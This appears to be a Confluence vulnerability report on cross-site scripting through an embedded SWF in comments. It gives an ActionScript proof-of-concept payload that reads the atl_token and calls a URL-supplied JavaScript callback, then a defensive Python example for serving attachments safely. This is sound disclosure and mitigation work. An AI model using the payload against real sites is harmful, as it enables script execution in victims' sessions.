In the Confluence comment module, a user can embed an SWF file in their comment. Confluence uses an `atl_token` parameter on the GET HTTP request, so if the attacker sends the link of the .swf file (the value of src on the embed tag) to his victim, the malicious .SWF won't execute in the victim's browser.

We can bypass this protection by using this.loaderInfo.parameters in the malicious .swf; this.loaderInfo.parameters.parameter_name extracts the value of your target parameter, in this case atl_token. I also inserted an <a> tag in the malicious swf file, so if the victim clicks the link in our embedded swf file, the .swf file will run in the victim's browser.

PAYLOAD

package
{
    import flash.display.Sprite;
    import flash.text.TextFormat;
    import flash.text.TextField;
    import flash.external.ExternalInterface;

    public class Main extends Sprite
    {
        public function Main()
        {
            super();
            var myFormat:TextFormat = new TextFormat();
            myFormat.size = 200;
            // read the atl_token the page put on this SWF's own URL
            var xcode:String = this.loaderInfo.parameters.atl_token;
            var myText:TextField = new TextField();
            myText.width = 1000;
            myText.height = 1000;
            myText.htmlText = "<font size=\'300px\'> <a target=\'_blank\' href=\'https://pwnie.ninja/confluence/download/attachments/9469955/NewProjectx.swf?atl_token=" + xcode + "&callback=alert\'>CliCK ME</a> </font>";
            addChild(myText);
            // call the JavaScript function named by the callback URL parameter
            ExternalInterface.call(this.loaderInfo.parameters.callback, "xss");
        }
    }
}

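The report's core point is that a token carried in the SWF's own URL is readable by the SWF (through loaderInfo.parameters), so a URL-borne token cannot stop the embedded object from re-invoking itself with a valid token; the durable defence is to never let an uploaded active-content file run inline in the application's origin. The following is an added example written for this issue, not Confluence's or Atlassian's code: it builds the response headers an attachment download handler would emit (forcing a download with a generic MIME type for SWF and other active types, plus nosniff), and includes a small check for whether a URL exposes the token in its query string. The content-type and extension lists, the filename sanitiser and the sample URL are all constructed for the example.

```python
"""Serving user-uploaded attachments so that embedded active content
(such as an .swf) cannot execute in the site's own origin.
Added example for this issue; not Confluence's code."""
import re
from urllib.parse import parse_qs, urlsplit

# MIME types a browser or plugin would execute in-page instead of displaying.
# Constructed list; extend it to whatever the deployment's plugins can run.
ACTIVE_CONTENT_TYPES = {
    "application/x-shockwave-flash",
    "text/html",
    "application/xhtml+xml",
    "image/svg+xml",
}

# Extensions treated as active regardless of the declared MIME type, so an
# upload mislabelled as image/png is still caught. Constructed list.
ACTIVE_EXTENSIONS = {".swf", ".html", ".htm", ".svg", ".xhtml"}


def _safe_filename(name: str) -> str:
    """Keep only characters that cannot break the Content-Disposition header."""
    base = name.rsplit("/", 1)[-1].rsplit("\\", 1)[-1]
    return re.sub(r"[^A-Za-z0-9._-]", "_", base) or "download"


def is_active_content(filename: str, content_type: str) -> bool:
    """True when either the declared type or the extension is active content."""
    ct = content_type.split(";")[0].strip().lower()
    ext = ("." + filename.rsplit(".", 1)[-1].lower()) if "." in filename else ""
    return ct in ACTIVE_CONTENT_TYPES or ext in ACTIVE_EXTENSIONS


def attachment_headers(filename: str, content_type: str) -> dict:
    """Headers for serving one stored attachment.

    Active content is forced to download under a generic MIME type, so even a
    direct link to the file (the click-through step in the report) produces a
    save dialog instead of a plugin running inside the application's origin.
    """
    safe = _safe_filename(filename)
    headers = {"X-Content-Type-Options": "nosniff"}  # no sniffing upgrade
    if is_active_content(filename, content_type):
        headers["Content-Type"] = "application/octet-stream"
        headers["Content-Disposition"] = f'attachment; filename="{safe}"'
    else:
        headers["Content-Type"] = content_type
        headers["Content-Disposition"] = f'inline; filename="{safe}"'
    return headers


def url_exposes_token(url: str, token_param: str = "atl_token") -> bool:
    """True if the token rides in the query string, where an embedded object
    can read it back through its own loader parameters."""
    return token_param in parse_qs(urlsplit(url).query)


if __name__ == "__main__":
    # Constructed sample URL with a placeholder token value.
    sample = "https://example.invalid/download/attachments/1/x.swf?atl_token=TOKEN-PLACEHOLDER&callback=alert"
    print("token in URL:", url_exposes_token(sample))
    print(attachment_headers("x.swf", "application/x-shockwave-flash"))
    print(attachment_headers("photo.png", "image/png"))
```

Serving the attachment from a separate, cookie-less domain is the complementary measure: then even an inline render lands in an origin that holds no session and cannot reach the application's JavaScript through ExternalInterface.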
[CONFSERVER-38127] xss by swf file
Phong Quoc Le (Inactive)